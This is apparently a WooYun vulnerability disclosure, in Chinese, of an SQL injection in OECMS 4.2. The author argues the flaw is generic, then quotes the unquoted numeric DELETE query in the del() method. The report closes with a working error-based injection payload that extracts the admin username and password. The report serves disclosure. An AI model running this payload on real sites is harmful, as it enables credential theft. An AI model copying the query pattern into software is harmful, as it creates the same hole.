WooYun.org

补充内容：wooyun审核的大大让我补充案例来证明通用性，我想说，OECMS已经在wooyun通过过通用漏洞了，见这里 WooYun: 代码审计系列9: OEcms 远程代码执行(CSRF) ；
既然让我补充那我就补充一下吧。google:powered by oecms


官网提供的部分案例如下



OECMS的用户量还是不小的。
这里有一个问题需要说明，本漏洞出在OECMS最新的版本，是2014.10.08升级的一个文件中，原来的版本中
并不存在，所以在网络上无法找到更多的真实案例，我想wooyun审核的大大可以理解，这并不能说这个漏洞
不是通用或者危害不大，下图证明oecms4.2漏洞所在文件的更新的时间



现在拿网上的一个真实案例来说明一下，见下图

无关代码
function daddslashes($string) {
	if(!MAGIC_QUOTES_GPC) {
		if(is_array($string)) {
			foreach($string as $key => $val) {
				$string[$key] = daddslashes($val);
			}
		} else {
			$string = addslashes($string);
		}
	}
	return $string;
}
if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])){
	exit('Request tainting attempted.');
}
$_GET       = daddslashes($_GET);
$_POST      = daddslashes($_POST);
$_COOKIE	= daddslashes($_COOKIE);
$_REQUEST   = daddslashes($_REQUEST);
$_FILES     = daddslashes($_FILES);
$_SERVER	= daddslashes($_SERVER);
无关代码

无关代码
public function control_dellist()
    { 
        X::loadUtil('request');
        $id = XRequest::getGet('id');
        $model = parent::model('buylist', 'im');
        $model->del($id);
        unset($model);
}
无关代码

public static function getGet($name = '') {
		if (empty($name)) return $_GET;
		return (isset($_GET[$name])) ? $_GET[$name] : '';
	}

public function del($id)
    {
        parent::$obj->query('DELETE from ' . DB_PREFIX . 'tmpbuy where id=' . $id);
    }

or (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(adminname,0x23,password)FROM oecmspre_admin LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)